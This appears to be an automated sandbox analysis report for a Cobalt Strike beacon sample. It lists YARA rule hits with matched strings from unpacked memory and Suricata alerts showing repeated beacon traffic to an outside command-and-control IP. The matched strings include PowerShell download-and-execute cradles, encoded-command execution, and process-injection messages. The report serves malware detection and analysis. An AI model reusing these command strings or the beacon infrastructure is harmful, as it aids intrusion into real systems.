0.2.P3KxDOMmD3.exe.660000.2.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
0.2.P3KxDOMmD3.exe.660000.2.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.P3KxDOMmD3.exe.660000.2.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.P3KxDOMmD3.exe.660000.2.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.660000.2.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
0.2.P3KxDOMmD3.exe.660000.2.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.660000.2.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
0.2.P3KxDOMmD3.exe.660000.2.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.660000.2.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.P3KxDOMmD3.exe.660000.2.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.660000.2.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.P3KxDOMmD3.exe.1a0000.0.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
Click to see the 40 entries

Suricata Signatures

ET MALWARE Cobalt Strike Beacon Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T22:00:04.887327+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49730	89.197.154.116	7810	TCP
2024-10-07T22:00:06.825937+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49731	89.197.154.116	7810	TCP
2024-10-07T22:00:08.534715+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49732	89.197.154.116	7810	TCP
2024-10-07T22:00:10.264513+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49733	89.197.154.116	7810	TCP
2024-10-07T22:00:12.028170+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49734	89.197.154.116	7810	TCP
2024-10-07T22:00:13.851716+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49735	89.197.154.116	7810	TCP
2024-10-07T22:00:15.567674+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49736	89.197.154.116	7810	TCP
2024-10-07T22:00:17.303031+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49737	89.197.154.116	7810	TCP
2024-10-07T22:00:19.019522+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49738	89.197.154.116	7810	TCP
2024-10-07T22:00:20.715916+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49741	89.197.154.116	7810	TCP
2024-10-07T22:00:22.559096+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49745	89.197.154.116	7810	TCP
2024-10-07T22:00:24.295931+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49747	89.197.154.116	7810	TCP
2024-10-07T22:00:26.003982+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49748	89.197.154.116	7810	TCP
2024-10-07T22:00:27.767095+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49749	89.197.154.116	7810	TCP
2024-10-07T22:00:29.450557+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49750	89.197.154.116	7810	TCP
2024-10-07T22:00:33.574658+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49751	89.197.154.116	7810	TCP
2024-10-07T22:00:35.545658+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49752	89.197.154.116	7810	TCP
2024-10-07T22:00:37.247360+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49753	89.197.154.116	7810	TCP
2024-10-07T22:00:38.969491+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49754	89.197.154.116	7810	TCP
2024-10-07T22:00:40.675331+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49755	89.197.154.116	7810	TCP
2024-10-07T22:00:42.358293+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49756	89.197.154.116	7810	TCP
2024-10-07T22:00:44.092723+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49757	89.197.154.116	7810	TCP
2024-10-07T22:00:45.812862+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49758	89.197.154.116	7810	TCP
2024-10-07T22:00:47.535783+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49759	89.197.154.116	7810	TCP
2024-10-07T22:00:49.272785+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49760	89.197.154.116	7810	TCP
2024-10-07T22:00:50.988910+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49761	89.197.154.116	7810	TCP
2024-10-07T22:00:52.881734+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49762	89.197.154.116	7810	TCP
2024-10-07T22:00:54.576802+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49763	89.197.154.116	7810	TCP
2024-10-07T22:00:56.263309+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49764	89.197.154.116	7810	TCP
2024-10-07T22:00:57.971739+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49765	89.197.154.116	7810	TCP
2024-10-07T22:00:59.680335+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49767	89.197.154.116	7810	TCP
2024-10-07T22:01:01.395075+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49769	89.197.154.116	7810	TCP
2024-10-07T22:01:03.285490+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49780	89.197.154.116	7810	TCP
2024-10-07T22:01:04.987483+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49791	89.197.154.116	7810	TCP
2024-10-07T22:01:06.689132+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49807	89.197.154.116	7810	TCP
2024-10-07T22:01:08.658738+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49818	89.197.154.116	7810	TCP
2024-10-07T22:01:10.359503+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49825	89.197.154.116	7810	TCP
2024-10-07T22:01:12.084607+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49840	89.197.154.116	7810	TCP
2024-10-07T22:01:13.796875+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49851	89.197.154.116	7810	TCP
2024-10-07T22:01:15.534739+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49857	89.197.154.116	7810	TCP
2024-10-07T22:01:17.252714+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49868	89.197.154.116	7810	TCP
2024-10-07T22:01:18.941423+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49879	89.197.154.116	7810	TCP
2024-10-07T22:01:20.873023+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49894	89.197.154.116	7810	TCP
2024-10-07T22:01:22.591355+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49906	89.197.154.116	7810	TCP
2024-10-07T22:01:24.295453+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49918	89.197.154.116	7810	TCP
2024-10-07T22:01:25.987531+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49931	89.197.154.116	7810	TCP
2024-10-07T22:01:30.231283+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49939	89.197.154.116	7810	TCP
2024-10-07T22:01:31.987185+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49964	89.197.154.116	7810	TCP
2024-10-07T22:01:33.703695+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49974	89.197.154.116	7810	TCP
2024-10-07T22:01:35.440140+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49985	89.197.154.116	7810	TCP
2024-10-07T22:01:37.248186+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49999	89.197.154.116	7810	TCP
2024-10-07T22:01:38.959548+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50010	89.197.154.116	7810	TCP
2024-10-07T22:01:40.674934+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50022	89.197.154.116	7810	TCP
2024-10-07T22:01:42.555618+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	50031	89.197.154.116	7810	TCP
